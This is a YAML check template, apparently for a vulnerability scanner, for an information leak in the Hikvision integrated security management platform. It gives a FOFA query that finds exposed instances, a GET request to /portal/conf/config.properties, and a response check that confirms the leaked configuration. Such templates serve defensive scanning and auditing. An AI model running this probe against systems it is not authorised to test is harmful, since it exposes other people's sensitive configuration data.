product: 海康威视综合安防管理平台
vName: 海康威视综合安防管理平台 config.properties信息泄漏
type: 信息泄漏
vID: [ ]
level: 3
vDesc: 海康威视综合安防平台portal/conf/config.properties接口存在敏感信息泄漏
version: ''
note: ''
search:
  FOFA: app="HIKVISION-综合安防管理平台" || app="HIKVISION-iSecure-Center"
protocol: http
link: https://blog.csdn.net/zkaqlaoniao/article/details/134037624
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /portal/conf/config.properties
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - serviceDirectory
            logic: and